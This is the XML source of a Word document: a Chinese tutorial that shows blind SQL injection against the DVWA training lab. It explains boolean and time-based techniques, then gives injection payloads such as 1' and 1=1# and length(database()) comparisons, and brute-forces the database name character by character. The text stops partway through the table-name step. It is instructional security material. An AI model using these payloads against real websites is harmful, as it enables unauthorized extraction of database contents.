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19743" w14:textId="2CC63AC1" w:rsidR="00F4545C" w:rsidRDefault="00733321" w:rsidP="00733321">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>注入盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC8C72B" w14:textId="0086D5C4" w:rsidR="00733321" w:rsidRDefault="00733321" w:rsidP="00733321">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline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733321">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SQL Injection（Blind），即SQL盲注，与一般注入的区别在于，一般的注入攻击者可以直接从页面上看到注入语句的执行结果，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00733321">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>而盲注时</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00733321">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00733321">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>因此盲注的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00733321">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC36B70" w14:textId="33D3494C" w:rsidR="00733321" w:rsidRDefault="00733321" w:rsidP="00733321">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盲注思路</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4BAFB75C" w14:textId="734C8CCC" w:rsidR="00733321" w:rsidRDefault="00733321" w:rsidP="00733321">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盲注分布尔盲注</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和时间盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC2640C" w14:textId="32D4C41A" w:rsidR="00733321" w:rsidRDefault="00733321" w:rsidP="00733321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Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的页面的仅仅会返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>布尔盲注是</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>返回的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>或者是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来得到数据库中的相关信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2773E919" w14:textId="596398D7" w:rsidR="00733321" w:rsidRDefault="00733321" w:rsidP="00733321">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222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222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>时间盲注是</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>利用插入的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>语句执行造成的时间延时来判断是对的还是错的，是真的就会根据你设置的时间来</w:t>
      </w:r>
      <w:r w:rsidR="002371A3">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>延时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>返回消息</w:t>
      </w:r>
      <w:r w:rsidR="002371A3">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，如果是错的就会直给你报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEB56AE" w14:textId="4B69449A" w:rsidR="002371A3" w:rsidRDefault="002371A3" w:rsidP="00733321">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2079974C" w14:textId="73ADFFCB" w:rsidR="002371A3" w:rsidRDefault="002371A3" w:rsidP="00733321">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="753B0FFF" w14:textId="1C5F85E9" w:rsidR="002371A3" w:rsidRDefault="002371A3" w:rsidP="00733321">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222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222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>盲注的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>思路跟普通注入差不多</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A0EC6D" w14:textId="1AF3D7E9" w:rsidR="002371A3" w:rsidRDefault="002371A3" w:rsidP="00733321">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17AEB6BA" w14:textId="0B3AF35B" w:rsidR="002371A3" w:rsidRDefault="002371A3" w:rsidP="002371A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判断是否存在注入，注入的是字符型还是数字型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AF2568" w14:textId="7B23E67B" w:rsidR="002371A3" w:rsidRDefault="002371A3" w:rsidP="002371A3">
      <w:pPr>
        <w:pStyle w:val="a4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猜解数据库</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4DF9E4" w14:textId="07050A4A" w:rsidR="002371A3" w:rsidRDefault="002371A3" w:rsidP="002371A3">
      <w:pPr>
        <w:pStyle w:val="a4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猜解表</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67687340" w14:textId="4BDC3822" w:rsidR="002371A3" w:rsidRDefault="002371A3" w:rsidP="002371A3">
      <w:pPr>
        <w:pStyle w:val="a4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猜解字段名</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5A6245EB" w14:textId="73A8B3E0" w:rsidR="002371A3" w:rsidRDefault="002371A3" w:rsidP="002371A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猜解数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A09A04C" w14:textId="5DC5046B" w:rsidR="002371A3" w:rsidRDefault="002371A3" w:rsidP="002371A3"/>
    <w:p w14:paraId="4C0AFC50" w14:textId="087910E9" w:rsidR="002371A3" w:rsidRPr="00B32D82" w:rsidRDefault="002371A3" w:rsidP="00B32D82">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>evel:Low</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0FCD1834" w14:textId="278A5CF7" w:rsidR="002371A3" w:rsidRDefault="002371A3" w:rsidP="002371A3"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判断是否是存在注入，是字符型还是数字型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021D2A8E" w14:textId="0F4DB391" w:rsidR="00B32D82" w:rsidRDefault="00B32D82" w:rsidP="002371A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32EE7C92" wp14:editId="16B80513">
            <wp:extent cx="5274310" cy="1223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E5A0" w14:textId="2047D177" w:rsidR="002371A3" w:rsidRPr="002371A3" w:rsidRDefault="002371A3" w:rsidP="002371A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C4BBC95" w14:textId="1F5D2A3E" w:rsidR="00733321" w:rsidRDefault="00B32D82" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源码是没有对注入有任何防护的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542A5DAB" w14:textId="78585E75" w:rsidR="00B32D82" w:rsidRDefault="00B32D82" w:rsidP="00733321"/>
    <w:p w14:paraId="712C9993" w14:textId="570C8BF8" w:rsidR="00B32D82" w:rsidRDefault="00B32D82" w:rsidP="00733321"/>
    <w:p w14:paraId="571B96B4" w14:textId="67CA3FCB" w:rsidR="00B32D82" w:rsidRDefault="00B32D82" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9F3F81" w14:textId="54FE2E94" w:rsidR="00B32D82" w:rsidRDefault="00B32D82" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5097FCBE" wp14:editId="71C7DF62">
            <wp:extent cx="3161905" cy="11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C9D2" w14:textId="2B978956" w:rsidR="00B32D82" w:rsidRDefault="00B32D82" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说有这个id在数据库中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7C7365" w14:textId="79745A90" w:rsidR="00B32D82" w:rsidRDefault="00B32D82" w:rsidP="00733321">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and 1=2#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6432C3BB" w14:textId="37CF2675" w:rsidR="00B32D82" w:rsidRDefault="00B32D82" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C801C8C" wp14:editId="59D4124E">
            <wp:extent cx="3885714" cy="114285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3477" w14:textId="74EA2E82" w:rsidR="00B32D82" w:rsidRDefault="00B32D82" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说没有找不到这个id在数据库中，说明这是字符型注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570723CA" w14:textId="47F4F23F" w:rsidR="00B32D82" w:rsidRDefault="00B32D82" w:rsidP="00733321"/>
    <w:p w14:paraId="348BEA30" w14:textId="77777777" w:rsidR="00E136C2" w:rsidRDefault="00E136C2" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后测试数据库的长度先试试数据库名长度是否大于5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C11EB2" w14:textId="56493B09" w:rsidR="00B32D82" w:rsidRDefault="00E136C2" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rP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 and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>(database())&gt;5#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526AB165" w14:textId="555E03AB" w:rsidR="00E136C2" w:rsidRDefault="00E136C2" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65A856BC" wp14:editId="06145719">
            <wp:extent cx="3800000" cy="10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89B2" w14:textId="21A9F322" w:rsidR="00E136C2" w:rsidRDefault="00E136C2" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明不大于5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE11694" w14:textId="4D53E66A" w:rsidR="00E136C2" w:rsidRDefault="00E136C2" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用二分制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BB55D0" w14:textId="45C6786C" w:rsidR="00E136C2" w:rsidRDefault="00E136C2" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看看是否大于三</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0698E7" w14:textId="7C9B4F85" w:rsidR="00E136C2" w:rsidRDefault="00E136C2" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>’ and length(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>database(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>))&gt;3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1225F5B6" w14:textId="324C5655" w:rsidR="00E136C2" w:rsidRDefault="00E136C2" w:rsidP="00733321">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3598B76C" wp14:editId="3EC17B15">
            <wp:extent cx="3638095" cy="102857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7E31" w14:textId="0A3008D1" w:rsidR="00E136C2" w:rsidRDefault="00E136C2" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说数据库有这个</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在，说明是正确的大于3小于5，那就是4了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F72449" w14:textId="77777777" w:rsidR="00E136C2" w:rsidRDefault="00E136C2" w:rsidP="00733321"/>
    <w:p w14:paraId="6F09F039" w14:textId="77777777" w:rsidR="00E136C2" w:rsidRDefault="00E136C2" w:rsidP="00733321"/>
    <w:p w14:paraId="36F2AB9F" w14:textId="77777777" w:rsidR="00E136C2" w:rsidRDefault="00E136C2" w:rsidP="00733321"/>
    <w:p w14:paraId="47C16616" w14:textId="77777777" w:rsidR="00E136C2" w:rsidRDefault="00E136C2" w:rsidP="00733321"/>
    <w:p w14:paraId="104D316E" w14:textId="77777777" w:rsidR="00E136C2" w:rsidRDefault="00E136C2" w:rsidP="00733321"/>
    <w:p w14:paraId="2576C3F6" w14:textId="77777777" w:rsidR="00E136C2" w:rsidRDefault="00E136C2" w:rsidP="00733321"/>
    <w:p w14:paraId="6F25FFB9" w14:textId="77777777" w:rsidR="00E136C2" w:rsidRDefault="00E136C2" w:rsidP="00733321"/>
    <w:p w14:paraId="12F26DE2" w14:textId="77777777" w:rsidR="00E136C2" w:rsidRDefault="00E136C2" w:rsidP="00733321"/>
    <w:p w14:paraId="4846586D" w14:textId="77777777" w:rsidR="00982E77" w:rsidRDefault="00E136C2" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>然后就是获取数据库名的字符了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D56738" w14:textId="3F10C1CA" w:rsidR="00982E77" w:rsidRDefault="00982E77" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要用到</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk47083888"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>(database(),1)=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>a’</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="00E73602" w14:textId="2C881F76" w:rsidR="00982E77" w:rsidRDefault="00982E77" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后再用a-z的字典进行bp爆破对比</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2BCF39" w14:textId="06BFB12C" w:rsidR="00775161" w:rsidRDefault="00775161" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F9F2712" wp14:editId="31F7B3F6">
            <wp:extent cx="5274310" cy="50895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AAEF" w14:textId="363BB99E" w:rsidR="00775161" w:rsidRDefault="00775161" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到第一个字母d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4CB9EB" w14:textId="01774C4E" w:rsidR="00775161" w:rsidRDefault="00775161" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ECA9FAA" wp14:editId="6E9C690F">
            <wp:extent cx="5274310" cy="1073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F685" w14:textId="43EDB668" w:rsidR="00775161" w:rsidRDefault="00775161" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后递进的方式爆破获取第二个字母</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117B7FB0" w14:textId="1DDB6485" w:rsidR="00775161" w:rsidRDefault="00775161" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40ADD004" wp14:editId="28F6C474">
            <wp:extent cx="5274310" cy="19024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F5A5" w14:textId="2410D83C" w:rsidR="00775161" w:rsidRDefault="00775161" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到字母v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35443AE2" w14:textId="4831BB6D" w:rsidR="00775161" w:rsidRDefault="00775161" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后这样继续下去到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F00FC0" w14:textId="069BD4CE" w:rsidR="00775161" w:rsidRDefault="00775161" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到第四个一起连起来得到数据库名</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="233FA6CC" w14:textId="1D8222FB" w:rsidR="00775161" w:rsidRDefault="00775161" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来是表名的获取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB1C903" w14:textId="73B734B2" w:rsidR="00477B9B" w:rsidRDefault="00775161" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表名就需要用到ASCII码来获取了</w:t>
      </w:r>
      <w:r w:rsidR="00477B9B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566D7E95" w14:textId="57533A56" w:rsidR="00477B9B" w:rsidRDefault="00477B9B" w:rsidP="00733321">
      <w:bookmarkStart w:id="1" w:name="_Hlk47039359"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ascii(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF1EB8E" w14:textId="08A693D0" w:rsidR="00477B9B" w:rsidRDefault="00477B9B" w:rsidP="00733321">
      <w:bookmarkStart w:id="2" w:name="_Hlk47039319"/>
      <w:bookmarkEnd w:id="1"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>ubstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
